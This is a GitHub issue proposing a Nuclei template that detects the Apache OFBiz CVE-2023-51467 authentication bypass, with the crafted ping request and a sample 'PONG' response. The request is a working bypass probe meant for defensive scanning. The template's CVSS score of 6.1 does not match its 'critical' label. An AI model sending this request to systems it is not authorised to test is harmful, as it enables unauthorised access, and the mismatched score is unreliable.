### ISSUE TITLE
Apache OFBiz CVE-2023-51467 PONG Check

### ISSUE THREAD

**Issue by JaneMandy** [projectdiscovery/nuclei-templates#8893]
### Template Information:
CVE-2023-51467 
Apache OFBiz is an e-commerce platform used to build large and medium-sized enterprise-level, cross-platform, cross-database, and cross-application server multi-layer, distributed e-commerce application systems.

After analysis and judgment, it is found that the vulnerability is easy to exploit. An attacker can construct a malicious request to bypass identity authentication and use the backend related interface functions to execute groovy code, resulting in remote code execution. It is recommended to fix it as soon as possible.

### Nuclei Template:

```yaml

id: CVE-2023-51467

info:
  name: Apache OFBiz CVE-2023-51467 Bypass Auth 
  author: pdteam
  severity: critical
  description: Detect whether the CVE-2023-51467 vulnerability exists in Apache ofbiz
  reference:
   - https://mp.weixin.qq.com/s/GfGb048u9VedzM2FhBJz8Q
   - https://stack.chaitin.com/vuldb/detail/2dbae0cb-0292-45ee-a66d-a2567b11b25
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-51467

  tags: cve,cve2023,apache,rce,bypass,ofbiz

requests:
  - raw:
      - |
        GET /webtools/control/ping?PASSWORD=X&USERNAME=&requirePasswordChange=Y HTTP/1.1
        Host: 127.0.0.1:8443
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0



    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "PONG"
        part: body
        condition: and


```

```
HTTP/1.1 200
Set-Cookie: JSESSIONID=B911685CD380F4765952819D88F5DFA0.jvm1; Path=/webtools; Secure; HttpOnly; SameSite=strict
Cache-Control: Set-Cookie
x-frame-options: sameorigin
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy-Report-Only: default-src 'self'
Set-Cookie: OFBiz.Visitor=10110; Max-Age=31536000; Expires=Mon, 30 Dec 2024 04:32:25 GMT; Path=/; Secure; HttpOnly; SameSite=strict
vary: accept-encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 31 Dec 2023 04:32:25 GMT
Content-Length: 6



PONG```
<!-- Include template results if available or redacted valid response snippet of valid match -->
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->
